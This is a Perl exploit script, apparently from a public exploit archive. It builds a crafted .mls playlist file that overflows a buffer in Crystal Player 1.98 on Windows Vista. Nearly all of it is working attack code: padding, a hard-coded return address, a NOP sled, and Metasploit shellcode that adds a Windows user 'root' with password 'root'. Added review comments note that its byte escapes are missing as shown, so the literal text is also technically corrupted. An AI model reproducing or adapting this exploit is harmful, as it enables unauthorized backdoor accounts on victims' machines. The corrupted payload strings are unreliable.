# Title : CrystalPlayer 1.98 Playlist Crafted mls File Local Buffer Overflow Exploit
# Published : 2007-07-26
# Author : Arham Muhammad
#!/usr/bin/perl
######################################################################################################################
#Crystal Player 1.98
#Playlist(.mls) File Local Buffer Overflow Exploit
#Source:: http://www.crystalplayer.com/CrystalPro.exe
#Credit To Timq For The Vulnerability
#POC By Arham Muhammad
#######################################################################################################################
#While Debugging EIP And EBP Successfully Gets Overwritten!
#Upon Successful Exploitation, A DoS Occurs And It Further Destroys The Libraries; When The App Is Next Executed
#It Throws A Microsoft Visual C++ Runtime Library Error Followed By Another Exception
#The POC Adds User "root" With Password "root" To The OS!
#Tested On x86 vista enterprise ed.
#Might Require Changing The ESP Address Because Of OS And Service-Pack Differences
# Writes ./buffer.mls as four concatenated pieces: padding, a 4-byte
# overwrite value, filler, then the payload.  No strict/warnings, so all
# variables here are package globals.
#
# NOTE(review): as rendered on this page the string literals carry no
# backslash escapes (e.g. "x90", "Exploitn"), so the script as shown writes
# plain ASCII text rather than bytes; presumably the escapes were lost in
# extraction.  Left byte-identical on purpose.
print "Crystal Player 1.98 Local Bufferoverflow Exploitn";
print "Creating Crafted .mls Filen";
$buff = 'A' x 1033;             # 1033 bytes of padding before the overwrite value
$ret = "x76xF5x48x37"; #call esp in ntdll.dll (hard-coded for the tested OS/SP, see header)
# win32_adduser - PASS=root EXITFUNC=seh USER=root Size=232 Encoder=PexFnstenvSub http://metasploit.com
$shellcode = "x2bxc9x83xe9xccxd9xeexd9x74x24xf4x5bx81x73x13xea". #Add user root with pass root 232 bytes
"x15xcdx86x83xebxfcxe2xf4x16xfdx89x86xeax15x46xc3".
"xd6x9exb1x83x92x14x22x0dxa5x0dx46xd9xcax14x26xcf".
"x61x21x46x87x04x24x0dx1fx46x91x0dxf2xedxd4x07x8b".
"xebxd7x26x72xd1x41xe9x82x9fxf0x46xd9xcex14x26xe0".
"x61x19x86x0dxb5x09xccx6dx61x09x46x87x01x9cx91xa2".
"xeexd6xfcx46x8ex9ex8dxb6x6fxd5xb5x8ax61x55xc1x0d".
"x9ax09x60x0dx82x1dx26x8fx61x95x7dx86xeax15x46xee".
"xd6x4axfcx70x8ax43x44x7ex69xd5xb6xd6x82xe5x47x82".
"xb5x7dx55x78x60x1bx9ax79x0dx76xa0xe2xc4x70xb5xe3".
"xcax3axaexa6x84x70xb9xa6x9fx66xa8xf4xcax67xa2xe9".
"x9ex35xbfxe9x85x61xedxa9xabx51x89xa6xccx33xedxe8".
"x8fx61xedxeax85x76xacxeax8dx67xa2xf3x9ax35x8cxe2".
"x87x7cxa3xefx99x61xbfxe7x9ex7axbfxf5xcax67xa2xe9".
"x9ex35xe2xc7xaex51xcdx86";
$nopsled = "x90" x 797; #Nopsled to fill the buffer (797 copies)
# Bareword handle, 2-arg open and no return-value check: if the open fails the
# prints below go nowhere and the "Created" message is still shown.  Output
# file name is fixed to ./buffer.mls in the current directory.
open(mls, ">./buffer.mls");
print mls "$buff";
print mls "$ret";
print mls "$nopsled";
print mls "$shellcode";
# Handle is never closed explicitly; it is flushed at interpreter exit.
print "Crafted File Created!n";
#Arham Muhammad
#rko.thelegendkiller@ gmail.com
#Greets:: str0ke,Hackman,tushy,And All My Friends, Specially AmBi(Love Ya!!!);
#Gr0undbreakerz
# www.Syue.com [2007-07-26]